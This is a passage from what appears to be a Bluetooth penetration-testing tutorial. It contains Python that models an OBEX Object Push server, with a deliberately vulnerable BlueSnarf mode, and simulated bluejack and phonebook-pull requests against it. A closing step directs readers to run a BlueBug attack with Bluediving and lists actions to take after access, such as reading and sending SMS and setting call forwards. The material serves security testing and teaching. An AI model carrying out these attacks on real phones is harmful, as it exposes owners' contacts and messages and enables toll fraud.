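            hlen = struct.unpack_from(">H", pkt, pos + 1)[0]
            if hlen < 3 or pos + hlen > total:
                raise ValueError(f"header 0x{hid:02x}: bad length {hlen}")
            data = pkt[pos + 3:pos + hlen]
            headers[hid] = data.decode("utf-16-be").rstrip("\x00") if kind == 0 else data
            pos += hlen
        else:
            size = 2 if kind == 2 else 5
            if pos + size > total:
                raise ValueError(f"header 0x{hid:02x}: truncated")
            headers[hid] = pkt[pos + 1] if kind == 2 else struct.unpack_from(">I", pkt, pos + 1)[0]
            pos += size
    return opcode, headers


class ObjectPushServer:
    """Model of a phone's OBEX Object Push service. vulnerable=True serves any
    named object from the telecom store on GET, which is the BlueSnarf flaw.
    The fixed version accepts PUT of objects, and GET only for the owner's own
    business card (the one GET the Object Push Profile defines)."""

    def __init__(self, vulnerable=False):
        self.vulnerable = vulnerable
        self.inbox = []
        self.telecom = {"telecom/pb.vcf": SAMPLE_PHONEBOOK, "telecom/cal.vcs": SAMPLE_CALENDAR}
        self.own_card = b"BEGIN:VCARD\r\nFN:Phone Owner\r\nEND:VCARD\r\n"

    def handle(self, pkt):
        opcode, h = parse_obex(pkt)
        if opcode == OBEX_PUT_FINAL:
            self.inbox.append((h.get(HDR_NAME), h.get(HDR_END_OF_BODY, b"")))
            return obex_packet(OBEX_OK, [])
        if opcode == OBEX_GET_FINAL:
            name = h.get(HDR_NAME)
            if not name:
                return obex_packet(OBEX_OK, [hdr_bytes(HDR_END_OF_BODY, self.own_card)])
            if self.vulnerable:
                obj = self.telecom.get(name)
                return (obex_packet(OBEX_OK, [hdr_bytes(HDR_END_OF_BODY, obj)]) if obj
                        else obex_packet(OBEX_NOT_FOUND, []))
            return obex_packet(OBEX_FORBIDDEN, [])
        return obex_packet(OBEX_BAD_REQUEST, [])


if __name__ == "__main__":
    phone = ObjectPushServer(vulnerable=True)
    print("bluejack :", hex(parse_obex(phone.handle(bluejack_push(b"BEGIN:VCARD\r\nFN:Free coffee inside\r\nEND:VCARD\r\n")))[0]))
    code, hdrs = parse_obex(phone.handle(bluesnarf_pull("telecom/pb.vcf")))
    print("bluesnarf:", hex(code), hdrs.get(HDR_END_OF_BODY, b"").decode())
    print("fixed    :", hex(parse_obex(ObjectPushServer().handle(bluesnarf_pull()))[0]))
```

A 0xA0 (Success) with an End-of-Body header on a GET for telecom/pb.vcf over the Object Push channel is the BlueSnarf finding; 0xC3 (Forbidden) or 0xC1 (Unauthorized) on the same request is the expected behaviour of a fixed device. Note that a successful PUT says nothing about BlueSnarf exposure, since accepting pushed vCards is what the profile is for.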

Step 10: Try a BlueBug Attack

Use the Bluediving penetration testing tool to perform a BlueBug attack.

This tool exploits the loopholes in Bluetooth and allows unauthorized access to another Bluetooth device. A BlueBug works by opening an RFCOMM channel on which the phone accepts AT commands without authentication.

After getting unauthorized access, try to:

• Set call forwards
• Read SMS from the phone
• Send SMS to any number
• Initiate phone calls
• Write phonebook entries

Posted: 14/12/2021, 21:19